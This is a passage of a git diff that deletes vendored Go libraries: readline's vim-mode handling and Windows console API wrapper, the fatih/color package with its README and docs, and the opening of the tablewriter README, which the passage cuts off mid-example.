ExitVimMode() { - o.vimMode = VIM_INSERT -} - -func (o *opVim) IsEnableVimMode() bool { - return o.cfg.VimMode -} - -func (o *opVim) handleVimNormalMovement(r rune, readNext func() rune) (t rune, handled bool) { - rb := o.op.buf - handled = true - switch r { - case 'h': - t = CharBackward - case 'j': - t = CharNext - case 'k': - t = CharPrev - case 'l': - t = CharForward - case '0', '^': - rb.MoveToLineStart() - case '$': - rb.MoveToLineEnd() - case 'x': - rb.Delete() - if rb.IsCursorInEnd() { - rb.MoveBackward() - } - case 'r': - rb.Replace(readNext()) - case 'd': - next := readNext() - switch next { - case 'd': - rb.Erase() - case 'w': - rb.DeleteWord() - case 'h': - rb.Backspace() - case 'l': - rb.Delete() - } - case 'b', 'B': - rb.MoveToPrevWord() - case 'w', 'W': - rb.MoveToNextWord() - case 'e', 'E': - rb.MoveToEndWord() - case 'f', 'F', 't', 'T': - next := readNext() - prevChar := r == 't' || r == 'T' - reverse := r == 'F' || r == 'T' - switch next { - case CharEsc: - default: - rb.MoveTo(next, prevChar, reverse) - } - default: - return r, false - } - return t, true -} - -func (o *opVim) handleVimNormalEnterInsert(r rune, readNext func() rune) (t rune, handled bool) { - rb := o.op.buf - handled = true - switch r { - case 'i': - case 'I': - rb.MoveToLineStart() - case 'a': - rb.MoveForward() - case 'A': - rb.MoveToLineEnd() - case 's': - rb.Delete() - case 'S': - rb.Erase() - case 'c': - next := readNext() - switch next { - case 'c': - rb.Erase() - case 'w': - rb.DeleteWord() - case 'h': - rb.Backspace() - case 'l': - rb.Delete() - } - default: - return r, false - } - - o.EnterVimInsertMode() - return -} - -func (o *opVim) HandleVimNormal(r rune, readNext func() rune) (t rune) { - switch r { - case CharEnter, CharInterrupt: - o.ExitVimMode() - return r - } - - if r, handled := o.handleVimNormalMovement(r, readNext); handled { - return r - } - - if r, handled := o.handleVimNormalEnterInsert(r, readNext); handled { - return r - } - - // invalid operation - o.op.t.Bell() - return 0 -} - -func (o *opVim) EnterVimInsertMode() { - o.vimMode = VIM_INSERT -} - -func (o *opVim) ExitVimInsertMode() { - o.vimMode = VIM_NORMAL -} - -func (o *opVim) HandleVim(r rune, readNext func() rune) rune { - if o.vimMode == VIM_NORMAL { - return o.HandleVimNormal(r, readNext) - } - if r == CharEsc { - o.ExitVimInsertMode() - return 0 - } - - switch o.vimMode { - case VIM_INSERT: - return r - case VIM_VISUAL: - } - return r -} diff --git a/vendor/github.com/chzyer/readline/windows_api.go b/vendor/github.com/chzyer/readline/windows_api.go deleted file mode 100644 index 63f4f7b7..00000000 --- a/vendor/github.com/chzyer/readline/windows_api.go +++ /dev/null @@ -1,152 +0,0 @@ -// +build windows - -package readline - -import ( - "reflect" - "syscall" - "unsafe" -) - -var ( - kernel = NewKernel() - stdout = uintptr(syscall.Stdout) - stdin = uintptr(syscall.Stdin) -) - -type Kernel struct { - SetConsoleCursorPosition, - SetConsoleTextAttribute, - FillConsoleOutputCharacterW, - FillConsoleOutputAttribute, - ReadConsoleInputW, - GetConsoleScreenBufferInfo, - GetConsoleCursorInfo, - GetStdHandle CallFunc -} - -type short int16 -type word uint16 -type dword uint32 -type wchar uint16 - -type _COORD struct { - x short - y short -} - -func (c *_COORD) ptr() uintptr { - return uintptr(*(*int32)(unsafe.Pointer(c))) -} - -const ( - EVENT_KEY = 0x0001 - EVENT_MOUSE = 0x0002 - EVENT_WINDOW_BUFFER_SIZE = 0x0004 - EVENT_MENU = 0x0008 - EVENT_FOCUS = 0x0010 -) - -type _KEY_EVENT_RECORD struct { - bKeyDown int32 - wRepeatCount word - wVirtualKeyCode word - wVirtualScanCode word - unicodeChar wchar - dwControlKeyState dword -} - -// KEY_EVENT_RECORD KeyEvent; -// MOUSE_EVENT_RECORD MouseEvent; -// WINDOW_BUFFER_SIZE_RECORD WindowBufferSizeEvent; -// MENU_EVENT_RECORD MenuEvent; -// FOCUS_EVENT_RECORD FocusEvent; -type _INPUT_RECORD struct { - EventType word - Padding uint16 - Event [16]byte -} - -type _CONSOLE_SCREEN_BUFFER_INFO struct { - dwSize _COORD - dwCursorPosition _COORD - wAttributes word - srWindow _SMALL_RECT - dwMaximumWindowSize _COORD -} - -type _SMALL_RECT struct { - left short - top short - right short - bottom short -} - -type _CONSOLE_CURSOR_INFO struct { - dwSize dword - bVisible bool -} - -type CallFunc func(u ...uintptr) error - -func NewKernel() *Kernel { - k := &Kernel{} - kernel32 := syscall.NewLazyDLL("kernel32.dll") - v := reflect.ValueOf(k).Elem() - t := v.Type() - for i := 0; i < t.NumField(); i++ { - name := t.Field(i).Name - f := kernel32.NewProc(name) - v.Field(i).Set(reflect.ValueOf(k.Wrap(f))) - } - return k -} - -func (k *Kernel) Wrap(p *syscall.LazyProc) CallFunc { - return func(args ...uintptr) error { - var r0 uintptr - var e1 syscall.Errno - size := uintptr(len(args)) - if len(args) <= 3 { - buf := make([]uintptr, 3) - copy(buf, args) - r0, _, e1 = syscall.Syscall(p.Addr(), size, - buf[0], buf[1], buf[2]) - } else { - buf := make([]uintptr, 6) - copy(buf, args) - r0, _, e1 = syscall.Syscall6(p.Addr(), size, - buf[0], buf[1], buf[2], buf[3], buf[4], buf[5], - ) - } - - if int(r0) == 0 { - if e1 != 0 { - return error(e1) - } else { - return syscall.EINVAL - } - } - return nil - } - -} - -func GetConsoleScreenBufferInfo() (*_CONSOLE_SCREEN_BUFFER_INFO, error) { - t := new(_CONSOLE_SCREEN_BUFFER_INFO) - err := kernel.GetConsoleScreenBufferInfo( - stdout, - uintptr(unsafe.Pointer(t)), - ) - return t, err -} - -func GetConsoleCursorInfo() (*_CONSOLE_CURSOR_INFO, error) { - t := new(_CONSOLE_CURSOR_INFO) - err := kernel.GetConsoleCursorInfo(stdout, uintptr(unsafe.Pointer(t))) - return t, err -} - -func SetConsoleCursorPosition(c *_COORD) error { - return kernel.SetConsoleCursorPosition(stdout, c.ptr()) -} diff --git a/vendor/github.com/fatih/color/LICENSE.md b/vendor/github.com/fatih/color/LICENSE.md deleted file mode 100644 index 25fdaf63..00000000 --- a/vendor/github.com/fatih/color/LICENSE.md +++ /dev/null @@ -1,20 +0,0 @@ -The MIT License (MIT) - -Copyright (c) 2013 Fatih Arslan - -Permission is hereby granted, free of charge, to any person obtaining a copy of -this software and associated documentation files (the "Software"), to deal in -the Software without restriction, including without limitation the rights to -use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of -the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS -FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR -COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER -IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN -CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/vendor/github.com/fatih/color/README.md b/vendor/github.com/fatih/color/README.md deleted file mode 100644 index 6e39e919..00000000 --- a/vendor/github.com/fatih/color/README.md +++ /dev/null @@ -1,154 +0,0 @@ -# Color [![GoDoc](http://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](http://godoc.org/github.com/fatih/color) [![Build Status](http://img.shields.io/travis/fatih/color.svg?style=flat-square)](https://travis-ci.org/fatih/color) - - - -Color lets you use colorized outputs in terms of [ANSI Escape -Codes](http://en.wikipedia.org/wiki/ANSI_escape_code#Colors) in Go (Golang). It -has support for Windows too! The API can be used in several ways, pick one that -suits you. - - - -![Color](http://i.imgur.com/c1JI0lA.png) - - -## Install - -```bash -go get github.com/fatih/color -``` - -## Examples - -### Standard colors - -```go -// Print with default helper functions -color.Cyan("Prints text in cyan.") - -// A newline will be appended automatically -color.Blue("Prints %s in blue.", "text") - -// These are using the default foreground colors -color.Red("We have red") -color.Magenta("And many others ..") - -``` - -### Mix and reuse colors - -```go -// Create a new color object -c := color.New(color.FgCyan).Add(color.Underline) -c.Println("Prints cyan text with an underline.") - -// Or just add them to New() -d := color.New(color.FgCyan, color.Bold) -d.Printf("This prints bold cyan %s\n", "too!.") - -// Mix up foreground and background colors, create new mixes! -red := color.New(color.FgRed) - -boldRed := red.Add(color.Bold) -boldRed.Println("This will print text in bold red.") - -whiteBackground := red.Add(color.BgWhite) -whiteBackground.Println("Red text with white background.") -``` - -### Custom print functions (PrintFunc) - -```go -// Create a custom print function for convenience -red := color.New(color.FgRed).PrintfFunc() -red("Warning") -red("Error: %s", err) - -// Mix up multiple attributes -notice := color.New(color.Bold, color.FgGreen).PrintlnFunc() -notice("Don't forget this...") -``` - -### Insert into noncolor strings (SprintFunc) - -```go -// Create SprintXxx functions to mix strings with other non-colorized strings: -yellow := color.New(color.FgYellow).SprintFunc() -red := color.New(color.FgRed).SprintFunc() -fmt.Printf("This is a %s and this is %s.\n", yellow("warning"), red("error")) - -info := color.New(color.FgWhite, color.BgGreen).SprintFunc() -fmt.Printf("This %s rocks!\n", info("package")) - -// Use helper functions -fmt.Println("This", color.RedString("warning"), "should be not neglected.") -fmt.Printf("%v %v\n", color.GreenString("Info:"), "an important message.") - -// Windows supported too! Just don't forget to change the output to color.Output -fmt.Fprintf(color.Output, "Windows support: %s", color.GreenString("PASS")) -``` - -### Plug into existing code - -```go -// Use handy standard colors -color.Set(color.FgYellow) - -fmt.Println("Existing text will now be in yellow") -fmt.Printf("This one %s\n", "too") - -color.Unset() // Don't forget to unset - -// You can mix up parameters -color.Set(color.FgMagenta, color.Bold) -defer color.Unset() // Use it in your function - -fmt.Println("All text will now be bold magenta.") -``` - -### Disable color - -There might be a case where you want to disable color output (for example to -pipe the standard output of your app to somewhere else). `Color` has support to -disable colors both globally and for single color definition. For example -suppose you have a CLI app and a `--no-color` bool flag. You can easily disable -the color output with: - -```go - -var flagNoColor = flag.Bool("no-color", false, "Disable color output") - -if *flagNoColor { - color.NoColor = true // disables colorized output -} -``` - -It also has support for single color definitions (local). You can -disable/enable color output on the fly: - -```go -c := color.New(color.FgCyan) -c.Println("Prints cyan text") - -c.DisableColor() -c.Println("This is printed without any color") - -c.EnableColor() -c.Println("This prints again cyan...") -``` - -## Todo - -* Save/Return previous values -* Evaluate fmt.Formatter interface - - -## Credits - - * [Fatih Arslan](https://github.com/fatih) - * Windows support via @mattn: [colorable](https://github.com/mattn/go-colorable) - -## License - -The MIT License (MIT) - see [`LICENSE.md`](https://github.com/fatih/color/blob/master/LICENSE.md) for more details - diff --git a/vendor/github.com/fatih/color/color.go b/vendor/github.com/fatih/color/color.go deleted file mode 100644 index 06f4867f..00000000 --- a/vendor/github.com/fatih/color/color.go +++ /dev/null @@ -1,423 +0,0 @@ -package color - -import ( - "fmt" - "os" - "strconv" - "strings" - "sync" - - "github.com/mattn/go-colorable" - "github.com/mattn/go-isatty" -) - -// NoColor defines if the output is colorized or not. It's dynamically set to -// false or true based on the stdout's file descriptor referring to a terminal -// or not. This is a global option and affects all colors. For more control -// over each color block use the methods DisableColor() individually. -var NoColor = !isatty.IsTerminal(os.Stdout.Fd()) - -// Color defines a custom color object which is defined by SGR parameters. -type Color struct { - params []Attribute - noColor *bool -} - -// Attribute defines a single SGR Code -type Attribute int - -const escape = "\x1b" - -// Base attributes -const ( - Reset Attribute = iota - Bold - Faint - Italic - Underline - BlinkSlow - BlinkRapid - ReverseVideo - Concealed - CrossedOut -) - -// Foreground text colors -const ( - FgBlack Attribute = iota + 30 - FgRed - FgGreen - FgYellow - FgBlue - FgMagenta - FgCyan - FgWhite -) - -// Foreground Hi-Intensity text colors -const ( - FgHiBlack Attribute = iota + 90 - FgHiRed - FgHiGreen - FgHiYellow - FgHiBlue - FgHiMagenta - FgHiCyan - FgHiWhite -) - -// Background text colors -const ( - BgBlack Attribute = iota + 40 - BgRed - BgGreen - BgYellow - BgBlue - BgMagenta - BgCyan - BgWhite -) - -// Background Hi-Intensity text colors -const ( - BgHiBlack Attribute = iota + 100 - BgHiRed - BgHiGreen - BgHiYellow - BgHiBlue - BgHiMagenta - BgHiCyan - BgHiWhite -) - -// New returns a newly created color object. -func New(value ...Attribute) *Color { - c := &Color{params: make([]Attribute, 0)} - c.Add(value...) - return c -} - -// Set sets the given parameters immediately. It will change the color of -// output with the given SGR parameters until color.Unset() is called. -func Set(p ...Attribute) *Color { - c := New(p...) - c.Set() - return c -} - -// Unset resets all escape attributes and clears the output. Usually should -// be called after Set(). -func Unset() { - if NoColor { - return - } - - fmt.Fprintf(Output, "%s[%dm", escape, Reset) -} - -// Set sets the SGR sequence. -func (c *Color) Set() *Color { - if c.isNoColorSet() { - return c - } - - fmt.Fprintf(Output, c.format()) - return c -} - -func (c *Color) unset() { - if c.isNoColorSet() { - return - } - - Unset() -} - -// Add is used to chain SGR parameters. Use as many as parameters to combine -// and create custom color objects. Example: Add(color.FgRed, color.Underline). -func (c *Color) Add(value ...Attribute) *Color { - c.params = append(c.params, value...) - return c -} - -func (c *Color) prepend(value Attribute) { - c.params = append(c.params, 0) - copy(c.params[1:], c.params[0:]) - c.params[0] = value -} - -// Output defines the standard output of the print functions. By default -// os.Stdout is used. -var Output = colorable.NewColorableStdout() - -// Print formats using the default formats for its operands and writes to -// standard output. Spaces are added between operands when neither is a -// string. It returns the number of bytes written and any write error -// encountered. This is the standard fmt.Print() method wrapped with the given -// color. -func (c *Color) Print(a ...interface{}) (n int, err error) { - c.Set() - defer c.unset() - - return fmt.Fprint(Output, a...) -} - -// Printf formats according to a format specifier and writes to standard output. -// It returns the number of bytes written and any write error encountered. -// This is the standard fmt.Printf() method wrapped with the given color. -func (c *Color) Printf(format string, a ...interface{}) (n int, err error) { - c.Set() - defer c.unset() - - return fmt.Fprintf(Output, format, a...) -} - -// Println formats using the default formats for its operands and writes to -// standard output. Spaces are always added between operands and a newline is -// appended. It returns the number of bytes written and any write error -// encountered. This is the standard fmt.Print() method wrapped with the given -// color. -func (c *Color) Println(a ...interface{}) (n int, err error) { - c.Set() - defer c.unset() - - return fmt.Fprintln(Output, a...) -} - -// PrintFunc returns a new function that prints the passed arguments as -// colorized with color.Print(). -func (c *Color) PrintFunc() func(a ...interface{}) { - return func(a ...interface{}) { c.Print(a...) } -} - -// PrintfFunc returns a new function that prints the passed arguments as -// colorized with color.Printf(). -func (c *Color) PrintfFunc() func(format string, a ...interface{}) { - return func(format string, a ...interface{}) { c.Printf(format, a...) } -} - -// PrintlnFunc returns a new function that prints the passed arguments as -// colorized with color.Println(). -func (c *Color) PrintlnFunc() func(a ...interface{}) { - return func(a ...interface{}) { c.Println(a...) } -} - -// SprintFunc returns a new function that returns colorized strings for the -// given arguments with fmt.Sprint(). Useful to put into or mix into other -// string. Windows users should use this in conjuction with color.Output, example: -// -// put := New(FgYellow).SprintFunc() -// fmt.Fprintf(color.Output, "This is a %s", put("warning")) -func (c *Color) SprintFunc() func(a ...interface{}) string { - return func(a ...interface{}) string { - return c.wrap(fmt.Sprint(a...)) - } -} - -// SprintfFunc returns a new function that returns colorized strings for the -// given arguments with fmt.Sprintf(). Useful to put into or mix into other -// string. Windows users should use this in conjuction with color.Output. -func (c *Color) SprintfFunc() func(format string, a ...interface{}) string { - return func(format string, a ...interface{}) string { - return c.wrap(fmt.Sprintf(format, a...)) - } -} - -// SprintlnFunc returns a new function that returns colorized strings for the -// given arguments with fmt.Sprintln(). Useful to put into or mix into other -// string. Windows users should use this in conjuction with color.Output. -func (c *Color) SprintlnFunc() func(a ...interface{}) string { - return func(a ...interface{}) string { - return c.wrap(fmt.Sprintln(a...)) - } -} - -// sequence returns a formated SGR sequence to be plugged into a "\x1b[...m" -// an example output might be: "1;36" -> bold cyan -func (c *Color) sequence() string { - format := make([]string, len(c.params)) - for i, v := range c.params { - format[i] = strconv.Itoa(int(v)) - } - - return strings.Join(format, ";") -} - -// wrap wraps the s string with the colors attributes. The string is ready to -// be printed. -func (c *Color) wrap(s string) string { - if c.isNoColorSet() { - return s - } - - return c.format() + s + c.unformat() -} - -func (c *Color) format() string { - return fmt.Sprintf("%s[%sm", escape, c.sequence()) -} - -func (c *Color) unformat() string { - return fmt.Sprintf("%s[%dm", escape, Reset) -} - -// DisableColor disables the color output. Useful to not change any existing -// code and still being able to output. Can be used for flags like -// "--no-color". To enable back use EnableColor() method. -func (c *Color) DisableColor() { - c.noColor = boolPtr(true) -} - -// EnableColor enables the color output. Use it in conjuction with -// DisableColor(). Otherwise this method has no side effects. -func (c *Color) EnableColor() { - c.noColor = boolPtr(false) -} - -func (c *Color) isNoColorSet() bool { - // check first if we have user setted action - if c.noColor != nil { - return *c.noColor - } - - // if not return the global option, which is disabled by default - return NoColor -} - -// Equals returns a boolean value indicating whether two colors are equal. -func (c *Color) Equals(c2 *Color) bool { - if len(c.params) != len(c2.params) { - return false - } - - for _, attr := range c.params { - if !c2.attrExists(attr) { - return false - } - } - - return true -} - -func (c *Color) attrExists(a Attribute) bool { - for _, attr := range c.params { - if attr == a { - return true - } - } - - return false -} - -func boolPtr(v bool) *bool { - return &v -} - -// colorsCache is used to reduce the count of created Color objects and -// allows to reuse already created objects with required Attribute. -var colorsCache = make(map[Attribute]*Color) - -var colorsCacheMu = new(sync.Mutex) // protects colorsCache - -func getCachedColor(p Attribute) *Color { - colorsCacheMu.Lock() - defer colorsCacheMu.Unlock() - - c, ok := colorsCache[p] - if !ok { - c = New(p) - colorsCache[p] = c - } - - return c -} - -func colorPrint(format string, p Attribute, a ...interface{}) { - c := getCachedColor(p) - - if !strings.HasSuffix(format, "\n") { - format += "\n" - } - - if len(a) == 0 { - c.Print(format) - } else { - c.Printf(format, a...) - } -} - -func colorString(format string, p Attribute, a ...interface{}) string { - c := getCachedColor(p) - - if len(a) == 0 { - return c.SprintFunc()(format) - } - - return c.SprintfFunc()(format, a...) -} - -// Black is an convenient helper function to print with black foreground. A -// newline is appended to format by default. -func Black(format string, a ...interface{}) { colorPrint(format, FgBlack, a...) } - -// Red is an convenient helper function to print with red foreground. A -// newline is appended to format by default. -func Red(format string, a ...interface{}) { colorPrint(format, FgRed, a...) } - -// Green is an convenient helper function to print with green foreground. A -// newline is appended to format by default. -func Green(format string, a ...interface{}) { colorPrint(format, FgGreen, a...) } - -// Yellow is an convenient helper function to print with yellow foreground. -// A newline is appended to format by default. -func Yellow(format string, a ...interface{}) { colorPrint(format, FgYellow, a...) } - -// Blue is an convenient helper function to print with blue foreground. A -// newline is appended to format by default. -func Blue(format string, a ...interface{}) { colorPrint(format, FgBlue, a...) } - -// Magenta is an convenient helper function to print with magenta foreground. -// A newline is appended to format by default. -func Magenta(format string, a ...interface{}) { colorPrint(format, FgMagenta, a...) } - -// Cyan is an convenient helper function to print with cyan foreground. A -// newline is appended to format by default. -func Cyan(format string, a ...interface{}) { colorPrint(format, FgCyan, a...) } - -// White is an convenient helper function to print with white foreground. A -// newline is appended to format by default. -func White(format string, a ...interface{}) { colorPrint(format, FgWhite, a...) } - -// BlackString is an convenient helper function to return a string with black -// foreground. -func BlackString(format string, a ...interface{}) string { return colorString(format, FgBlack, a...) } - -// RedString is an convenient helper function to return a string with red -// foreground. -func RedString(format string, a ...interface{}) string { return colorString(format, FgRed, a...) } - -// GreenString is an convenient helper function to return a string with green -// foreground. -func GreenString(format string, a ...interface{}) string { return colorString(format, FgGreen, a...) } - -// YellowString is an convenient helper function to return a string with yellow -// foreground. -func YellowString(format string, a ...interface{}) string { return colorString(format, FgYellow, a...) } - -// BlueString is an convenient helper function to return a string with blue -// foreground. -func BlueString(format string, a ...interface{}) string { return colorString(format, FgBlue, a...) } - -// MagentaString is an convenient helper function to return a string with magenta -// foreground. -func MagentaString(format string, a ...interface{}) string { - return colorString(format, FgMagenta, a...) -} - -// CyanString is an convenient helper function to return a string with cyan -// foreground. -func CyanString(format string, a ...interface{}) string { return colorString(format, FgCyan, a...) } - -// WhiteString is an convenient helper function to return a string with white -// foreground. -func WhiteString(format string, a ...interface{}) string { return colorString(format, FgWhite, a...) } diff --git a/vendor/github.com/fatih/color/doc.go b/vendor/github.com/fatih/color/doc.go deleted file mode 100644 index 17908787..00000000 --- a/vendor/github.com/fatih/color/doc.go +++ /dev/null @@ -1,114 +0,0 @@ -/* -Package color is an ANSI color package to output colorized or SGR defined -output to the standard output. The API can be used in several way, pick one -that suits you. - -Use simple and default helper functions with predefined foreground colors: - - color.Cyan("Prints text in cyan.") - - // a newline will be appended automatically - color.Blue("Prints %s in blue.", "text") - - // More default foreground colors.. - color.Red("We have red") - color.Yellow("Yellow color too!") - color.Magenta("And many others ..") - -However there are times where custom color mixes are required. Below are some -examples to create custom color objects and use the print functions of each -separate color object. - - // Create a new color object - c := color.New(color.FgCyan).Add(color.Underline) - c.Println("Prints cyan text with an underline.") - - // Or just add them to New() - d := color.New(color.FgCyan, color.Bold) - d.Printf("This prints bold cyan %s\n", "too!.") - - - // Mix up foreground and background colors, create new mixes! - red := color.New(color.FgRed) - - boldRed := red.Add(color.Bold) - boldRed.Println("This will print text in bold red.") - - whiteBackground := red.Add(color.BgWhite) - whiteBackground.Println("Red text with White background.") - - -You can create PrintXxx functions to simplify even more: - - // Create a custom print function for convenient - red := color.New(color.FgRed).PrintfFunc() - red("warning") - red("error: %s", err) - - // Mix up multiple attributes - notice := color.New(color.Bold, color.FgGreen).PrintlnFunc() - notice("don't forget this...") - - -Or create SprintXxx functions to mix strings with other non-colorized strings: - - yellow := New(FgYellow).SprintFunc() - red := New(FgRed).SprintFunc() - - fmt.Printf("this is a %s and this is %s.\n", yellow("warning"), red("error")) - - info := New(FgWhite, BgGreen).SprintFunc() - fmt.Printf("this %s rocks!\n", info("package")) - -Windows support is enabled by default. All Print functions works as intended. -However only for color.SprintXXX functions, user should use fmt.FprintXXX and -set the output to color.Output: - - fmt.Fprintf(color.Output, "Windows support: %s", color.GreenString("PASS")) - - info := New(FgWhite, BgGreen).SprintFunc() - fmt.Fprintf(color.Output, "this %s rocks!\n", info("package")) - -Using with existing code is possible. Just use the Set() method to set the -standard output to the given parameters. That way a rewrite of an existing -code is not required. - - // Use handy standard colors. - color.Set(color.FgYellow) - - fmt.Println("Existing text will be now in Yellow") - fmt.Printf("This one %s\n", "too") - - color.Unset() // don't forget to unset - - // You can mix up parameters - color.Set(color.FgMagenta, color.Bold) - defer color.Unset() // use it in your function - - fmt.Println("All text will be now bold magenta.") - -There might be a case where you want to disable color output (for example to -pipe the standard output of your app to somewhere else). `Color` has support to -disable colors both globally and for single color definition. For example -suppose you have a CLI app and a `--no-color` bool flag. You can easily disable -the color output with: - - var flagNoColor = flag.Bool("no-color", false, "Disable color output") - - if *flagNoColor { - color.NoColor = true // disables colorized output - } - -It also has support for single color definitions (local). You can -disable/enable color output on the fly: - - c := color.New(color.FgCyan) - c.Println("Prints cyan text") - - c.DisableColor() - c.Println("This is printed without any color") - - c.EnableColor() - c.Println("This prints again cyan...") -*/ -package color diff --git a/vendor/github.com/olekukonko/tablewriter/LICENCE.md b/vendor/github.com/olekukonko/tablewriter/LICENCE.md deleted file mode 100644 index 1fd84842..00000000 --- a/vendor/github.com/olekukonko/tablewriter/LICENCE.md +++ /dev/null @@ -1,19 +0,0 @@ -Copyright (C) 2014 by Oleku Konko - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. \ No newline at end of file diff --git a/vendor/github.com/olekukonko/tablewriter/README.md b/vendor/github.com/olekukonko/tablewriter/README.md deleted file mode 100644 index 805330ad..00000000 --- a/vendor/github.com/olekukonko/tablewriter/README.md +++ /dev/null @@ -1,204 +0,0 @@ -ASCII Table Writer -========= - -[![Build Status](https://travis-ci.org/olekukonko/tablewriter.png?branch=master)](https://travis-ci.org/olekukonko/tablewriter) [![Total views](https://sourcegraph.com/api/repos/github.com/olekukonko/tablewriter/counters/views.png)](https://sourcegraph.com/github.com/olekukonko/tablewriter) - -Generate ASCII table on the fly ... Installation is simple as - - go get github.com/olekukonko/tablewriter - - -#### Features -- Automatic Padding -- Support Multiple Lines -- Supports Alignment -- Support Custom Separators -- Automatic Alignment of numbers & percentage -- Write directly to http , file etc via `io.Writer` -- Read directly from CSV file -- Optional row line via `SetRowLine` -- Normalise table header -- Make CSV Headers optional -- Enable or disable table border -- Set custom footer support -- Optional identical cells merging - - -#### Example 1 - Basic -```go -data := [][]string{ - []string{"A", "The Good", "500"}, - []string{"B", "The Very very Bad Man", "288"}, - []string{"C", "The Ugly", "120"}, - []string{"D", "The Gopher", "800"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Name", "Sign", "Rating"}) - -for _, v := range data { - table.Append(v) -} -table.Render() // Send output -``` - -##### Output 1 -``` -+------+-----------------------+--------+ -| NAME | SIGN | RATING | -+------+-----------------------+--------+ -| A | The Good | 500 | -| B | The Very very Bad Man | 288 | -| C | The Ugly | 120 | -| D | The Gopher | 800 | -+------+-----------------------+--------+ -``` - -#### Example 2 - Without Border / Footer / Bulk Append -```go -data := [][]string{ - []string{"1/1/2014", "Domain name", "2233", "$10.98"}, - []string{"1/1/2014", "January Hosting", "2233", "$54.95"}, - []string{"1/4/2014", "February Hosting", "2233", "$51.00"}, - []string{"1/4/2014", "February Extra Bandwidth", "2233", "$30.00"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Date", "Description", "CV2", "Amount"}) -table.SetFooter([]string{"", "", "Total", "$146.93"}) // Add Footer -table.SetBorder(false) // Set Border to false -table.AppendBulk(data) // Add Bulk Data -table.Render() -``` - -##### Output 2 -``` - - DATE | DESCRIPTION | CV2 | AMOUNT -+----------+--------------------------+-------+---------+ - 1/1/2014 | Domain name | 2233 | $10.98 - 1/1/2014 | January Hosting | 2233 | $54.95 - 1/4/2014 | February Hosting | 2233 | $51.00 - 1/4/2014 | February Extra Bandwidth | 2233 | $30.00 -+----------+--------------------------+-------+---------+ - TOTAL | $146 93 - +-------+---------+ - -``` - - -#### Example 3 - CSV -```go -table, _ := tablewriter.NewCSV(os.Stdout, "test_info.csv", true) -table.SetAlignment(tablewriter.ALIGN_LEFT) // Set Alignment -table.Render() -``` - -##### Output 3 -``` -+----------+--------------+------+-----+---------+----------------+ -| FIELD | TYPE | NULL | KEY | DEFAULT | EXTRA | -+----------+--------------+------+-----+---------+----------------+ -| user_id | smallint(5) | NO | PRI | NULL | auto_increment | -| username | varchar(10) | NO | | NULL | | -| password | varchar(100) | NO | | NULL | | -+----------+--------------+------+-----+---------+----------------+ -``` - -#### Example 4 - Custom Separator -```go -table, _ := tablewriter.NewCSV(os.Stdout, "test.csv", true) -table.SetRowLine(true) // Enable row line - -// Change table lines -table.SetCenterSeparator("*") -table.SetColumnSeparator("‡") -table.SetRowSeparator("-") - -table.SetAlignment(tablewriter.ALIGN_LEFT) -table.Render() -``` - -##### Output 4 -``` -*------------*-----------*---------* -╪ FIRST NAME ╪ LAST NAME ╪ SSN ╪ -*------------*-----------*---------* -╪ John ╪ Barry ╪ 123456 ╪ -*------------*-----------*---------* -╪ Kathy ╪ Smith ╪ 687987 ╪ -*------------*-----------*---------* -╪ Bob ╪ McCornick ╪ 3979870 ╪ -*------------*-----------*---------* -``` - -##### Example 5 - Markdown Format -```go -data := [][]string{ - []string{"1/1/2014", "Domain name", "2233", "$10.98"}, - []string{"1/1/2014", "January Hosting", "2233", "$54.95"}, - []string{"1/4/2014", "February Hosting", "2233", "$51.00"}, - []string{"1/4/2014", "February Extra Bandwidth", "2233", "$30.00"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Date", "Description", "CV2", "Amount"}) -table.SetBorders(tablewriter.Border{Left: true, Top: false, Right: true, Bottom: false}) -table.SetCenterSeparator("|") -table.AppendBulk(data) // Add Bulk Data -table.Render() -``` - -##### Output 5 -``` -| DATE | DESCRIPTION | CV2 | AMOUNT | -|----------|--------------------------|------|--------| -| 1/1/2014 | Domain name | 2233 | $10.98 | -| 1/1/2014 | January Hosting | 2233 | $54.95 | -| 1/4/2014 | February Hosting | 2233 | $51.00 | -| 1/4/2014 | February Extra Bandwidth | 2233 | $30.00 | -``` - -#### Example 6 - Identical cells merging -```go -data := [][]string{ - []string{"1/1/2014", "Domain name", "1234", "$10.98"}, - []string{"1/1/2014", "January Hosting", "2345", "$54.95"}, - []string{"1/4/2014", "February Hosting", "3456", "$51.00"}, - []string{"1/4/2014", "February Extra Bandwidth", "4567", "$30.00"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Date", "Description", "CV2", "Amount"}) -table.SetFooter([]string{"", "", "Total", "$146.93"}) -table.SetAutoMergeCells(true) -table.SetRowLine(true) -table.AppendBulk(data) 